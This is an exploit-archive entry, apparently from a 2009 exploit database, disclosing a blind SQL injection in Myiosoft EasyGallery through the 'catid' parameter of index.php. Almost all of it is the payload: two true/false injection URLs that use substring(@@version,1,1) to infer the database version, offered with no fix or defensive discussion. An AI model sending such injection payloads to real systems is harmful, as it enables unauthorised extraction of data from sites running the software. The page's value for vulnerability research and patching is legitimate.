[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Myiosoft EasyGallery (catid) Blind SQL Injection Vulnerability
# Published : 2009-12-31
# Author : Hussin X
# Previous Title : PhotoDiary 1.3 (lng) LFI Vulnerability
# Next Title : Pre ADS Portal (cid) Remote SQL Injection Vulnerability
Myiosoft easygallery (catid) Blind SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home : www.IQ-TY.com<http://www.IQ-TY.com>
MaiL : darkangeL_G85@Yahoo.CoM
___________________________________
script : http://myiosoft.com/?1.105.0.0
Exploit :
_______
true & false
http://server/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=4 > false
http://server/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=5 > true
end
IQ-SecuritY FoRuM